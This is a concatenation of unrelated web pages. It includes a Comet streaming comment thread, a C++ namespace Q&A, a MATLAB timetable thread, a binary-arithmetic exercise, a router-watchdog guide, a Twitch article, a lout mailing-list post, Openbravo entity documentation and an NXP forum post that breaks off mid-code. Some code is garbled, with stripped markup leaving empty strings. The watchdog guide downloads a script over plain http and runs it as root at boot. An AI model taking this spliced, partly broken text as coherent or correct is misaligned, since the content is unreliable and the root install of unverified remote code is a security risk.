Is it possible to do iframe streaming in non-IE browsers without loading throb?…
Basically, iframe streaming works in all browsers (by have a hidden iframe to receive never ending “…..
17. Manh Le Says:
As far as I know Iframe streaming works in Chrome also. But for other browsers besides IE I would use XMLHttp Object, and use stage 3 to fetch the data from server.
My comet implementation for the client catches response pretty fast for XMLHTTP streaming, but very slow on Iframe Streaming (IE)/htmlfile for the first few message FLUSHES from the Server.
18. Simple PHP Comet example - JavaScript Joy Says:
[...] References: http://www.zeitoun.net/articles/comet_and_php/start http://cometdaily.com/2007/11/18/ie-activexhtmlfile-transport-part-ii/ [...]
19. Renato Elias Says:
Hi,
I'm reading about your problem with GC, and wondering whether you have tried using a return statement?
function connect_htmlfile(url, callback) {
  // no more 'var transferDoc…'
  var transferDoc = new ActiveXObject("htmlfile");
  transferDoc.open();
  transferDoc.write(
    "" +
    "document.domain='" + document.domain + "';" +
    "");
  transferDoc.close();
  var ifrDiv = transferDoc.createElement("div");
  transferDoc.body.appendChild(ifrDiv);
  ifrDiv.innerHTML = "";
  transferDoc.callback = callback;
  return transferDoc;
}
var channel = connect_htmlfile('/xxx/', function(data) {
});
and then ping the channel periodically:
setInterval((function(channel) {
  // ping channel
  return channel;
})(channel), 1000);
Copyright 2015 Comet Daily, LLC. All Rights Reserved
I'm working in C++14 and trying to figure out a way to put two classes (with the same name) inside the same header file. In this scenario one class would always be ignored as a result of something happening in main.cpp during runtime. Here's an example of this header file:
// First class:
class foo
{
public:
foo();
private:
int var;
};
foo::foo()
{
var = 1;
}
// Second class:
class foo
{
public:
foo();
private:
int var;
};
foo::foo()
{
var = 2;
}
So let's say during runtime the user entered "1". Then the first definition of class foo would be used, and the compiler would ignore the second class. But then if the user enters "2", the first class is ignored and the second class is used.
I know it's ugly, but in my specific case it saves a ton of work.
• You cannot do this. You need to learn about inheritance and polymorphism. – GrandmasterB Dec 27 '18 at 21:12
• Either you need a time machine in order for the runtime to affect the compilation process or you are not being clear what you exactly want to do. – Peter M Dec 27 '18 at 21:15
• @Peter M Do you mean a logical or bitwise or? – Inertial Ignorance Dec 27 '18 at 21:35
• I meant a Logical Or – Peter M Dec 27 '18 at 23:03
• I guess what you are really after is "foo" as an abstract base class of two other classes "foo1" and "foo2", and a factory method which creates either objects of type "foo1" or "foo2", which are then used as "foo" objects throughout the rest of the program. This approach has a name, it is called Strategy pattern. – Doc Brown Dec 28 '18 at 0:06
Technically, it's possible
You can give two different classes the same name, by putting each class in separate namespaces:
namespace space_1 {
class foo { ... };
}
namespace space_2 {
class foo { ... };
}
This defines two different and unrelated classes: space_1::foo and space_2::foo.
You may then define at compile time which namespace to use in the using context (in main(), or in a configuration header):
int main() {
using namespace space_1;
foo a;
}
If you want to choose either the one or the other at run time, you'll have to either use explicit scope resolution, or use the class and the defined object in a limited scope using a namespace:
if (a) {
using namespace space_1;
foo f;
// do smething with f HERE
}
else {
using namespace space_2;
foo f;
// do something else with f HERE
}
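Assembled into one compilable unit, the run-time choice above looks like this sketch (the function name `pick` is illustrative):

```cpp
#include <cassert>

namespace space_1 { struct foo { int var = 1; }; }
namespace space_2 { struct foo { int var = 2; }; }

// The run-time decision: each branch sees a different foo,
// and the object cannot outlive its block.
int pick(bool use_first) {
    if (use_first) {
        using namespace space_1;
        foo f;              // this is space_1::foo
        return f.var;
    } else {
        using namespace space_2;
        foo f;              // this is space_2::foo
        return f.var;
    }
}
```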
But does it make sense?
Using different namespaces for classes with the same name is typically used for managing compile-time library dependencies, for example:
• avoiding name conflicts between different components.
• new version of a library with a different interface.
• choice of alternative libraries (e.g. boost::xxx vs. std::xxx).
It is a very bad idea to use this construct for a different purpose, such as choosing the class implementations at runtime.
Is there a better design?
If you have a class with a well defined API, but need to cope with different variants/implementations at run time, you may consider polymorphism:
• Make foo an abstract base class, and create a derived class for every needed variant.
• Use a factory to instantiate the objects with the right derived class.
Alternatively, you may redesign your foo class, so that it requires a parameter in the constructor (i.e. the initial value of var in your case) or inject a strategy in the constructor.
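The redesign suggested above can be sketched as an abstract base plus a factory. `Foo`, `FooV1`, `FooV2` and `makeFoo` are illustrative names here, not the asker's real classes:

```cpp
#include <cassert>
#include <memory>

// Abstract interface: everything downstream works through Foo.
class Foo {
public:
    virtual ~Foo() = default;
    virtual int var() const = 0;
};

class FooV1 : public Foo {
public:
    int var() const override { return 1; }
};

class FooV2 : public Foo {
public:
    int var() const override { return 2; }
};

// The factory is the only place that knows the concrete variants,
// so the run-time choice ("user entered 1 or 2") lives here.
std::unique_ptr<Foo> makeFoo(int userChoice) {
    if (userChoice == 1) return std::make_unique<FooV1>();
    return std::make_unique<FooV2>();
}
```

Because callers only ever see `Foo`, one set of functions serves every variant, instead of one near-identical set per namespace.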
• I was under the impression that #define is only typed once at the start of a program. There's a way to use #define on two namespaces throughout a program to switch back and forth between their respective classes? – Inertial Ignorance Dec 27 '18 at 21:38
• I'm actually already doing what you coded (using different namespaces for my classes). It's worked well so far since I only ever use two classes at the same time. Now though I want to use 10+ of these classes, which would require 10 different namespaces. That would mean I have 10 different kinds of pointers/objects, requiring 10 different (essentially identical) functions for operating on each kind of pointer. I was hoping to get around this somehow. – Inertial Ignorance Dec 27 '18 at 21:43
• Yeah an abstract class is probably the best way to go, not sure why I didn't give it much thought. It would allow me to write functions acting on the same type for all 10 different objects. Thx! – Inertial Ignorance Dec 27 '18 at 21:53
• The question was "one class would always be ignored as a result of something happening in main.cpp during runtime" - but what you are showing above is a compile time decision, not a runtime decision. So either OP (in accepting your answer) did not understand what they were asking for, or they did not understand what your answer is about, or I did not understand something here. – Doc Brown Dec 27 '18 at 23:53
• @Christophe: I think it would be better if you edit your answer in a way other readers are not forced to scan through all the comments to understand why you did not answer the literal question, as it is written. – Doc Brown Dec 28 '18 at 0:59
Web Content Management Software
OVERVIEW In the vast expanse of the internet, Web Content Management Software (WCMS) emerges as an essential enabler for creating, managing, and publishing digital content. This sophisticated software simplifies the complex process of web development and allows individuals and businesses to maintain an up-to-date and engaging online presence without needing extensive technical expertise. WHO USES […]
How to find the min, max and mean values of 34 timetables stored in a 1 x 34 cell and add them as extra columns to the respective timetables?
19 views (last 30 days)
I have 34 CSV files that each consist of N rows and 3 columns. My code loops through one CSV file at a time (storing them in a 1 x 34 cell) and first converts each into an N x 2 timetable, TT{jj}. I then filter this timetable by a timerange (the difference between two dates and times in format dd/MM/uuuu HH:mm) to leave all the values within that timerange, which are stored in TT2{jj}. The timetables have 2 columns (date and time, temperature).
I now want to know how to find the min, max and mean values of the temperature column for each timetable and how to add these values to the original timetable to create a N x 5 timetable (date and time, temperature, min temp, max temp, mean temp) which would look like this:
e.g. for jj=1, the final table would look like:
Date/Time Temperature Min Max Mean
21/02/2020 08:00 20 16 20 18.25
21/02/2020 08:03 16
21/02/2020 08:06 18
21/02/2020 08:09 19
etc etc
Then it would loop again for jj=2 etc
The loop to create TT2{jj} is:
for jj = 1:34
thisfile{jj} = files{jj}.name; % creates a cell containing each CSV file name in directory
T{jj} = readtable(thisfile{jj},'Headerlines',19,'ReadVariableNames',true); % converts CSV to timetable ignoring rows 1-19
TT{jj} = table2timetable(T{jj}(:,[1 3])); % convert table to timetable and ignore column 2
TT2{jj} = TT{jj}(TR,:); % creates timetable containing all rows found within timerange TR
end
At the end of the loop (above) I export the 34 tables to one spreadsheet that has 34 tabs.
I have no idea how to proceed so any help would be appreciated.
Answers (3)
Sindar on 30 Apr 2020
Is this what you want to do:
• Load in a given table (say jj=1)
• create TT2{1}
• find the min of TT{1}.temperature
• add a third column to TT{1} containing this min in every row
• repeat for mean, max
• repeat for TT{2:34}
If so, then:
for jj = 1:34
thisfile{jj} = files{jj}.name; % creates a cell containing each CSV file name in directory
T{jj} = readtable(thisfile{jj},'Headerlines',19,'ReadVariableNames',true); % converts CSV to timetable ignoring rows 1-19
TT{jj} = table2timetable(T{jj}(:,[1 3])); % convert table to timetable and ignore column 2
TT2{jj} = TT{jj}(TR,:); % creates timetable containing all rows found within timerange TR
TT2{jj}.min_T=repelem(min(TT2{jj}{:,2}), size(TT2{jj},1), 1);
TT2{jj}.max_T=repelem(max(TT2{jj}{:,2}), size(TT2{jj},1), 1);
TT2{jj}.mean_T=repelem(mean(TT2{jj}{:,2}), size(TT2{jj},1), 1);
end
If you want to modify T (or likewise TT):
...
T{jj}.min_T=repelem(min(TT2{jj}{:,2}), size(T{jj},1), 1);
...
4 Comments
Sindar on 13 May 2020
Edited: Sindar on 13 May 2020
Reading the updated question, I see you want the data in different sheets of the same xls file. This sort of syntax will work for whichever method
writetimetable(TT2{jj},"table.xls",'Sheet',jj)
Guillaume on 1 May 2020
The simplest thing would be to add one column to each timetable to indicate the timetable of origin, then concatenate all these timetables into one timetable. Then with just one call to groupsummary, you can get your desired output.
However, if you get the mean, min and max for each timetable (one scalar value per statistic per timetable), I'm a bit unclear why you still want to store a datetime. Doesn't it become meaningless?
Anyway:
TT = cell(size(files));
for fileidx = 1:numel(files)
t = readtable(files(fileidx).name, 'Headerlines', 19, 'ReadVariableNames', true);
TT{fileidx} = table2timetable(t(:, [1, 3]))
TT{fileidx}.FileIndex(:) = fileidx; %add column with file number
end
alltimetables = vertcat(TT{:}); %concatenate all in one timetable
alltimetables = alltimetables(TR, :); %keep only desired timerange
ttstats = groupsummary(alltimetables, 'FileIndex', {'mean', 'min', 'max'}) %get mean min max for each FileIndex
Note that if you're using sufficiently recent version of matlab I'd replace the loop by:
TT = cell(size(files));
opts = detectImportOptions(files(1).name, 'NumHeaderLines', 19, 'ReadVariableNames', true);
opts.SelectedVariableNames = [1, 3]; %don't bother reading 2nd column
for fileidx = 1:numel(files)
TT{fileidx} = readtimetable(files(fileidx).name, opts);
TT{fileidx}.FileIndex(:) = fileidx; %add column with file number
end
%rest of code stays the same
1 Comment
Karl Dilkington on 13 May 2020
Thanks for your answer. I've amended my question to include a bit more detail and clarity on exactly what I need. At the end of my loop I export all 34 timetables to a spreadsheet with 34 tabs so I still need the date/time. I want the min, max and mean values so I don't have to do it manually for each timetable/tab in Excel.
I'm assuming the code to replace the loop is more efficient than what I have?
Thanks for your help.
Peter Perkins on 5 May 2020
As others have said, it seems to make little sense to create new variables in each timetable, each of which are a column vector of a constant. Maybe you want something like the following.
First, make something like your data:
n = 3;
tt_list = cell(n,1);
for i = 1:3
X = rand(5,1);
Time = datetime(2020,5,i)+days(rand(5,1));
tt_list{i} = timetable(Time,X);
end
Now get the stats for each timetable, and put those in a table that also includes your cell array of timetables:
t = table(tt_list,zeros(n,1),zeros(n,1),zeros(n,1),'VariableNames',["Data" "Mean" "Min" "Max"]);
for i = 1:n
t.Mean(i) = mean(tt_list{i}.X);
t.Min(i) = min(tt_list{i}.X);
t.Max(i) = max(tt_list{i}.X);
end
From that, you end up with
>> t
t =
3×4 table
Data Mean Min Max
_______________ _______ _______ _______
{5×1 timetable} 0.67375 0.4607 0.94475
{5×1 timetable} 0.56289 0.15039 0.9865
{5×1 timetable} 0.52956 0.26661 0.91785
That's the brute force way. As Guillaume suggests, you might find it convenient to put all your timetables in one longer one. The following gets you essentially yhe same table as above.
tt = vertcat(tt_list{:});
tt.Source = repelem(1:n,5)';
fun = @(x) deal(mean(x),min(x),max(x));
t = rowfun(fun,tt,'GroupingVariable','Source','NumOutputs',3, ...
'OutputFormat','table','OutputVariableNames',["Mean" "Min" "Max"])
>> t =
3×5 table
Source GroupCount Mean Min Max
______ __________ _______ _______ _______
1 5 0.67375 0.4607 0.94475
2 5 0.56289 0.15039 0.9865
3 5 0.52956 0.26661 0.91785
I used rowfun; splitapply or groupsummary would also work.
1 Comment
Karl Dilkington on 13 May 2020
Thanks for your answer. I've amended my question to include a bit more detail and clarity on exactly what I need. At the end of my loop I export all 34 timetables to a spreadsheet with 34 tabs so I still need the date/time. I want the min, max and mean values so I don't have to do it manually for each timetable/tab in Excel.
Thanks for your help.
1. Determine the decimal value of the following 8-bit 2's complement numbers.
(a) 11111011
(b) 00110111
(c) 11100011
2. Perform the following addition or subtraction of the given numbers using 8-bit 2's complement representation of the numbers. Parts (a) and (b) are given in decimal, while parts (c)-(e) are given in 8-bit 2's complement. Indicate in each case whether overflow occurs.
(a) (-65)+(+72)
(b) (-65)-(+72)
(c) 01101100-01010011
(d) 01101100+01010011
(e) 11100011+11111001
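Exercises like these can be checked mechanically. Below is a short Python sketch (the helper names to_signed and add8 are ours, not part of the exercise); subtraction is handled by adding the negation:

```python
def to_signed(bits: str) -> int:
    """Interpret an 8-bit pattern as a two's-complement integer."""
    value = int(bits, 2)
    return value - 256 if value >= 128 else value

def add8(a: int, b: int):
    """8-bit two's-complement addition: returns (wrapped result, overflow flag)."""
    true_sum = a + b                         # exact arithmetic
    wrapped = (true_sum + 128) % 256 - 128   # forced into [-128, 127]
    return wrapped, wrapped != true_sum      # overflow iff 8 bits can't hold it

print(to_signed("11111011"))   # 1(a) -> -5
print(add8(-65, 72))           # 2(a): (-65) + (+72) -> (7, False), no overflow
print(add8(-65, -72))          # 2(b): (-65) - (+72) -> (119, True), overflow
```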
Answers
Script that automatically reset the router when internet connection goes down
This monitoring procedure is performed by a bash script that sends pings to two different hosts, and if they do not respond, after some seconds or minutes, sends a command to Domoticz to activate the relay output that remove power supply to the router.
First, check that 127.0.0.1 (and your network, if you prefer) are specified in the Domoticz panel Setup -> Settings -> Local Networks: in this way any connection to domoticz from the specified networks do not need authentication (no username and password is required). If you add your LAN, all devices from your LAN can enter domoticz without asking for username and password.
domoticz setup settings localnetworks
To install the bash script, copy and paste the following code into the raspberry/linux shell:
#become root
sudo su
#download script
if [ `which wget` ]; then
    wget -O /usr/local/sbin/netwatchdog.sh http://docs.creasol.it/netwatchdog.sh
elif [ `which curl` ]; then
    curl -o /usr/local/sbin/netwatchdog.sh http://docs.creasol.it/netwatchdog.sh
else
    #wget and curl not installed: install now
    apt install wget curl
    wget -O /usr/local/sbin/netwatchdog.sh http://docs.creasol.it/netwatchdog.sh
fi
chmod 755 /usr/local/sbin/netwatchdog.sh
# prepare /etc/rc.local so it is sufficient to remove a # to let raspberry start the script at boot time
sed -i 's:^exit 0:#/usr/local/sbin/netwatchdog.sh >/dev/null 2>/dev/null \&\nexit 0:' /etc/rc.local
sed -i 's/amp;//' /etc/rc.local
Now, find the idx corresponding to the relay output: open the web browser to the Domoticz page, go to Setup -> Devices to list all installed devices. Look in the idx column to find the idx of the router power supply device.
How to find idx of a device
Now, copy&paste the following commands in the raspberry shell to put the script in debug mode (variable DEBUG=1 : in this way the script will print several debugging messages on the console and reduce the timings to check the script easily), edit the script (you have to write the right idx in the variable ROUTER_RELAY_IDX, check other variables, and type ctrl+x to exit):
#set DEBUG=1 in /usr/local/sbin/netwatchdog.sh
sed -i 's/^DEBUG=0\(.*\)/DEBUG=1\1/' /usr/local/sbin/netwatchdog.sh
#edit script
nano /usr/local/sbin/netwatchdog.sh
and finally start the script in debug mode (reset the router after only 20s of ping failures), writing some information in the console and other information in the logfile:
/usr/local/sbin/netwatchdog.sh
Remove the internet cable or switch-off the router: you should see that ping returns 100% packet loss and after 20s the script send a command to Domoticz to reset the router. Type ctrl+c to terminate the script.
If it works, type the following commands to edit /usr/local/sbin/netwatchdog.sh setting DEBUG=0 and to modify /etc/rc.local so the script is executed at boot time:
#set DEBUG=0 in /usr/local/sbin/netwatchdog.sh
sed -i 's/^DEBUG=1\(.*\)/DEBUG=0\1/' /usr/local/sbin/netwatchdog.sh
#and now let linux starting the script
sed -i 's:^#/usr/local/sbin/netwatchdog.sh:/usr/local/sbin/netwatchdog.sh:' /etc/rc.local
Now you have to reboot to let linux start the netwatchdog.sh script.
Good luck.
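For reference, the essence of such a watchdog fits in a couple of shell functions. This is a sketch, not the downloaded netwatchdog.sh: the host list, the device idx, the port, and the use of Domoticz's switchlight JSON command are assumptions you must adapt to your own setup.

```shell
#!/bin/sh
# Sketch of a router watchdog (adapt HOSTS, IDX and the Domoticz URL).
HOSTS="8.8.8.8 1.1.1.1"
IDX=5                                   # idx of the router power-supply device
DOMOTICZ="http://127.0.0.1:8080"

hosts_down() {
    # true (0) only when no host answers a single ping
    for h in $HOSTS; do
        ping -c1 -W2 "$h" >/dev/null 2>&1 && return 1
    done
    return 0
}

reset_router() {
    # normally-closed relay: Off removes power, On restores it
    curl -s "$DOMOTICZ/json.htm?type=command&param=switchlight&idx=$IDX&switchcmd=Off" >/dev/null
    sleep 10
    curl -s "$DOMOTICZ/json.htm?type=command&param=switchlight&idx=$IDX&switchcmd=On" >/dev/null
}

# The main loop would then be: while :; do hosts_down && reset_router; sleep 60; done
```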
How to Check Twitch Chat Logs?
Curious to know more about Twitch chat logs? Well, we have got your back. Twitch chats are Twitch's version of direct messages, and chat logs are the record of them. People who view your streams will be able to send you text messages, and with the help of chat logs, only you will be able to view them.
So we have prepared a short post to explain how you can access Twitch Chat logs and why Twitch Chat logs are essential for your channel.
How to Check Twitch Chat Logs?
Step #1: Log into your Twitch account by clicking here and navigate towards the right side of the screen, where you will find Channel Options.
Login to Twitch
Step #2: Here in this step, you need to click on Channel Option.
Click on channel option
Step #3: Now navigate to Chats, and a new window will open, and this will show you the chat logs of your account.
Navigate to Chat
Why Should You Care About Your Twitch Chat Logs?
• Feedback: You will be able to know how people are engaging with your content. Whether or not they can reciprocate. Many times people will give out free suggestions to improve your content and help you. They can also keep you up to date with the newest trends that other streamers are following.
• Monitoring your comments: You will be able to flag any messages which are harming your channel. Always allow for constructive criticism, but there will be some people whose comments might infuriate you. Or there might be some inappropriate comments not right for the age of people that you are targeting. In these cases, you should flag these comments or have a chat with the person responsible.
• Content engagement: By the number of chat logs, you will be able to decide whether or not your content is reaching the masses, and whether viewership is increasing or decreasing. Content engagement is a vital part of your Twitch streaming career.
Frequently Asked Questions
Can I see my twitch chat history?
If you’re a streamer or a mod of a streamer, then you can easily check Twitch chat logs. If not, then there is no way for viewers to see their twitch chat history.
Are twitch chats saved?
Yes, Twitch chats are saved. If you’re watching an archived stream, then you can see the old chat running in the chat section. This feature is similar to YouTube.
How do you retrieve deleted twitch messages?
If you’re a Twitch streamer, then you have to enable the option of seeing deleted messages in the chat section. Or your Mod can do it, and then you will be able to see deleted messages as well.
How do I see who is chatting on Twitch?
You can see the viewers count on the screen, which displays how many users are active on your channel at that time. But it doesn’t quite show how many of them are chatting right now. You can’t get the exact number.
Conclusion:
To conclude, Twitch chat logs are essential if you want to gain the perspective of your viewers. They will significantly improve the quality of your streams and help you gain more followers. We hope you liked our short and simple post on Twitch chat logs. If yes, then drop your thoughts in the comment section, or if you have any questions about the same, feel free to post them in the comment section below.
You may also like:
lout-users
Alignment problem
From: Thomas Baruchel
Subject: Alignment problem
Date: Fri, 30 May 2003 19:59:51 +0200
User-agent: Mutt/1.2.5i
Brest, Friday 30 May
Hi,
I don't understand how I can do that, because the concept of row mark
still is unfamiliar to me.
I have two objects on my line:
the first one is a "cline @Break" object with my name, etc.
Thomas Baruchel
15 rue Fréminville
29200 Brest
Phone: 999999
email : address@hidden
What I want is to have at the right of this "object", a word in a big size,
with a baseline being the same as the baseline of the email (which is the
last line of the left "object"). This word will be made with two components:
the initial capital, very big, with the same height as the whole
cline @Break described above, and the rest of the word, big but not as
big as the initial capital. A little like that (ascii art):
Thomas Baruchel | |
15 rue Fréminville | | _ _
29200 Brest +------+ ___| | | ___
| | / _ \ | |/ _ \
Phone: 999999 | | | __/ | | (_) |
email : address@hidden | | \___|_|_|\___/
I can't handle it with the 'row mark' notion, because this row mark
doesn't even seem to be the baseline of a word.
How could I do that ?
I don't ask how to compute the size of the capital, because I can put
it empirically, bt would be happy if there is a way to compute it. What
I really want is the perfect baseline alignment for:
'email', 'H' and 'ello'
Cordially,
P.-S. --- My initial (not working) code is:
clines @Break {Light 12p} @Font {
Thomas Baruchel
15 rue Fréminville
address@hidden Brest
/10p 11.25p @Font {Tél. address@hidden@address@hidden@Wide{}74}
/4p 9p @Font address@hidden
} |16p {Light 72p} @Font {H}
ERP/3.0/Developers Guide/Reference/Entity Model/CountryTrl
This article is protected against manual editing because it is automatically generated from Openbravo meta-data. Learn more about writing and translating such documents.
Back to ERP/3.0/Developers_Guide/Reference/Entity_Model#CountryTrl
CountryTrl
Translation
To the database table (C_Country_Trl) of this entity.
Properties
| Property | Column | Constraints | Type | Description |
|---|---|---|---|---|
| id* | C_Country_Trl_ID | Mandatory, Max Length: 32 | java.lang.String | |
| country | C_Country_ID | Mandatory | Country | The Country defines a Country. Each Country must be defined before it can be used in any document. |
| language | AD_Language | Mandatory | ADLanguage | The Language identifies the language to use for display |
| client | AD_Client_ID | Mandatory | ADClient | A Client is a company or a legal entity. You cannot share data between Clients. |
| organization | AD_Org_ID | Mandatory | Organization | An organization is a unit of your client or legal entity - examples are store, department. You can share data between organizations. |
| active | IsActive | Mandatory | java.lang.Boolean | There are two methods of making records unavailable in the system: one is to delete the record, the other is to de-activate it. A de-activated record is not available for selection, but available for reporting. There are two reasons for de-activating and not deleting records: (1) the system requires the record for auditing purposes; (2) the record is referenced by other records. E.g., you cannot delete a Business Partner if there are existing invoices for it. By de-activating the Business Partner you prevent it from being used in future transactions. |
| creationDate | Created | Mandatory | java.util.Date | The Created field indicates the date that this record was created. |
| createdBy | CreatedBy | Mandatory | ADUser | The Created By field indicates the user who created this record. |
| updated | Updated | Mandatory | java.util.Date | The Updated field indicates the date that this record was updated. |
| updatedBy | UpdatedBy | Mandatory | ADUser | The Updated By field indicates the user who updated this record. |
| translation | IsTranslated | Mandatory | java.lang.Boolean | The Translated checkbox indicates if this column is translated. |
| name# | Name | Mandatory, Max Length: 60 | java.lang.String | A more descriptive identifier (that does not need to be unique) of a record/document that is used as a default search option along with the search key (that is unique and mostly shorter). It is up to 60 characters in length. |
| description | Description | Max Length: 255 | java.lang.String | A description is limited to 255 characters. |
| regionName | RegionName | Max Length: 60 | java.lang.String | The Region Name defines the name that will print when this region is used in a document. |
| addressPrintFormat | DisplaySequence | Mandatory, Max Length: 20 | java.lang.String | The Address Print format defines the format to be used when this address prints. The following notations are used: @C@=City @P@=Postal @A@=PostalAdd @R@=Region |
Java Entity Class
/*
*************************************************************************
* The contents of this file are subject to the Openbravo Public License
* Version 1.1 (the "License"), being the Mozilla Public License
* Version 1.1 with a permitted attribution clause; you may not use this
* file except in compliance with the License. You may obtain a copy of
* the License at http://www.openbravo.com/legal/license.html
* Software distributed under the License is distributed on an "AS IS"
* basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the
* License for the specific language governing rights and limitations
* under the License.
* The Original Code is Openbravo ERP.
* The Initial Developer of the Original Code is Openbravo SLU
* All portions are Copyright (C) 2008-2014 Openbravo SLU
* All Rights Reserved.
* Contributor(s): ______________________________________.
************************************************************************
*/
package org.openbravo.model.common.geography;
import java.util.Date;
import org.openbravo.base.structure.ActiveEnabled;
import org.openbravo.base.structure.BaseOBObject;
import org.openbravo.base.structure.ClientEnabled;
import org.openbravo.base.structure.OrganizationEnabled;
import org.openbravo.base.structure.Traceable;
import org.openbravo.model.ad.access.User;
import org.openbravo.model.ad.system.Client;
import org.openbravo.model.ad.system.Language;
import org.openbravo.model.common.enterprise.Organization;
/**
* Entity class for entity CountryTrl (stored in table C_Country_Trl).
*
* NOTE: This class should not be instantiated directly. To instantiate this
* class the {@link org.openbravo.base.provider.OBProvider} should be used.
*/
public class CountryTrl extends BaseOBObject implements Traceable, ClientEnabled, OrganizationEnabled, ActiveEnabled {
private static final long serialVersionUID = 1L;
public static final String TABLE_NAME = "C_Country_Trl";
public static final String ENTITY_NAME = "CountryTrl";
public static final String PROPERTY_ID = "id";
public static final String PROPERTY_COUNTRY = "country";
public static final String PROPERTY_LANGUAGE = "language";
public static final String PROPERTY_CLIENT = "client";
public static final String PROPERTY_ORGANIZATION = "organization";
public static final String PROPERTY_ACTIVE = "active";
public static final String PROPERTY_CREATIONDATE = "creationDate";
public static final String PROPERTY_CREATEDBY = "createdBy";
public static final String PROPERTY_UPDATED = "updated";
public static final String PROPERTY_UPDATEDBY = "updatedBy";
public static final String PROPERTY_TRANSLATION = "translation";
public static final String PROPERTY_NAME = "name";
public static final String PROPERTY_DESCRIPTION = "description";
public static final String PROPERTY_REGIONNAME = "regionName";
public static final String PROPERTY_ADDRESSPRINTFORMAT = "addressPrintFormat";
public CountryTrl() {
setDefaultValue(PROPERTY_ACTIVE, true);
setDefaultValue(PROPERTY_TRANSLATION, false);
}
@Override
public String getEntityName() {
return ENTITY_NAME;
}
public String getId() {
return (String) get(PROPERTY_ID);
}
public void setId(String id) {
set(PROPERTY_ID, id);
}
public Country getCountry() {
return (Country) get(PROPERTY_COUNTRY);
}
public void setCountry(Country country) {
set(PROPERTY_COUNTRY, country);
}
public Language getLanguage() {
return (Language) get(PROPERTY_LANGUAGE);
}
public void setLanguage(Language language) {
set(PROPERTY_LANGUAGE, language);
}
public Client getClient() {
return (Client) get(PROPERTY_CLIENT);
}
public void setClient(Client client) {
set(PROPERTY_CLIENT, client);
}
public Organization getOrganization() {
return (Organization) get(PROPERTY_ORGANIZATION);
}
public void setOrganization(Organization organization) {
set(PROPERTY_ORGANIZATION, organization);
}
public Boolean isActive() {
return (Boolean) get(PROPERTY_ACTIVE);
}
public void setActive(Boolean active) {
set(PROPERTY_ACTIVE, active);
}
public Date getCreationDate() {
return (Date) get(PROPERTY_CREATIONDATE);
}
public void setCreationDate(Date creationDate) {
set(PROPERTY_CREATIONDATE, creationDate);
}
public User getCreatedBy() {
return (User) get(PROPERTY_CREATEDBY);
}
public void setCreatedBy(User createdBy) {
set(PROPERTY_CREATEDBY, createdBy);
}
public Date getUpdated() {
return (Date) get(PROPERTY_UPDATED);
}
public void setUpdated(Date updated) {
set(PROPERTY_UPDATED, updated);
}
public User getUpdatedBy() {
return (User) get(PROPERTY_UPDATEDBY);
}
public void setUpdatedBy(User updatedBy) {
set(PROPERTY_UPDATEDBY, updatedBy);
}
public Boolean isTranslation() {
return (Boolean) get(PROPERTY_TRANSLATION);
}
public void setTranslation(Boolean translation) {
set(PROPERTY_TRANSLATION, translation);
}
public String getName() {
return (String) get(PROPERTY_NAME);
}
public void setName(String name) {
set(PROPERTY_NAME, name);
}
public String getDescription() {
return (String) get(PROPERTY_DESCRIPTION);
}
public void setDescription(String description) {
set(PROPERTY_DESCRIPTION, description);
}
public String getRegionName() {
return (String) get(PROPERTY_REGIONNAME);
}
public void setRegionName(String regionName) {
set(PROPERTY_REGIONNAME, regionName);
}
public String getAddressPrintFormat() {
return (String) get(PROPERTY_ADDRESSPRINTFORMAT);
}
public void setAddressPrintFormat(String addressPrintFormat) {
set(PROPERTY_ADDRESSPRINTFORMAT, addressPrintFormat);
}
}
Retrieved from "http://wiki.openbravo.com/wiki/ERP/3.0/Developers_Guide/Reference/Entity_Model/CountryTrl"
This page was last modified on 5 August 2014, at 13:52. Content is available under the Creative Commons Attribution-ShareAlike 2.5 Spain License.
Is "DMEM_KERNEL_NUM" Missing When S32v234 DS2.0 Generates APU_XXX__MKDBStub?
Question asked by Brilly Wu on Jun 11, 2018
In the NXP\S32DS_Vision_v2.0\S32DS\s32v234_sdk\libs\apex\common\include\apu_microkernel.h file, two external variables are defined:
extern volatile int32_t DMEM_KERNEL_NUM[] __attribute__ ((section (".DMEM_KERNEL_NUM")));
extern volatile KERNEL_INFO DMEM_KERNEL_DB[] __attribute__ ((section (".DMEM_KERNEL_DB")));
In the DS2.0 compilation process, the generated file: 01workspace\DS_workspace\xxxAPU_gen\src\APU_xxx__MKDBstub.cpp, has only variables:
volatile KERNEL_INFO DMEM_KERNEL_DB[2] =
{
{(int32_t)(&APU_XXX), "APU_XXX"},
{0xFFFFFFFF, ""}
};
DMEM_KERNEL_NUM is not defined.
Also, the Load.h file generated when DS2.0 compiles:
const SEG_HOST_TYPE APU_WGH_LOAD_SEGMENTS[5][4] =
{
{  0, (SEG_HOST_TYPE)(&APU_WGH_LOAD_PMEM[   0]), 0x00000000, 16192 },
{  1, (SEG_HOST_TYPE)(&APU_WGH_LOAD_DMEM[   0]), 0x00000600,  8752 },
{  1, (SEG_HOST_TYPE)(&APU_WGH_LOAD_DMEM[2188]), 0x00010800,    68 },
{  2, 0, 0x00000100, 256 },
{ -1, 0, 0, 0 },
};
The db section content length shown is 68, which is exactly the size of DMEM_KERNEL_DB[2] plus the 4-byte kernel count.
In the resulting load.h:
const SEG_MEM_TYPE APU_WGH_LOAD_DMEM[2208] =
{
......
0x00000007U, 0x0000000DU, 0x5F555041U, 0x00484757U, // (2188) 00010800
0x00000000U, 0x00000000U, 0x00000000U, 0x00000000U, // (2192) 00010810
0x00000000U, 0xFFFFFFFFU, 0x00000000U, 0x00000000U, // (2196) 00010820
0x00000000U, 0x00000000U, 0x00000000U, 0x00000000U, // (2200) 00010830
0x00000000U, 0x00000000U, 0x00000000U, 0x00000000U, // (2204) 00010840
}
The first number is 7, which would mean there are 7 kernels. However, there are actually only two: one entry has address 0x0000000DU and the terminator entry has address 0xFFFFFFFFU.
In the file:
NXP\S32DS_Vision_v2.0\S32DS\s32v234_sdk\libs\apex\acf\src\kernel_manager_host.cpp,
This function causes an out-of-bounds memory access:
int KernelManager::InitLoadKernelDB( int /*apuid*/, const LOAD_SEGMENT_t* seg_addr)
{
......
memcpy(mkernel_list, (KERNEL_INFO*)(&(src_ptr[1])), sizeof(KERNEL_INFO)* kn);
}
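A possible defensive workaround is to distrust the count word read from the db section and clamp it before copying. The sketch below is my own self-contained illustration, not SDK code; kernel_info_t, MAX_KERNELS, and init_load_kernel_db are stand-in names:

```c
#include <stdint.h>
#include <string.h>

/* Stand-in for the SDK's KERNEL_INFO: a 4-byte address plus a name field. */
typedef struct {
    int32_t addr;
    char name[28];
} kernel_info_t;

#define MAX_KERNELS 2  /* actual number of entries built into the db */

/* Read the kernel count from the first word of the db section, but clamp it
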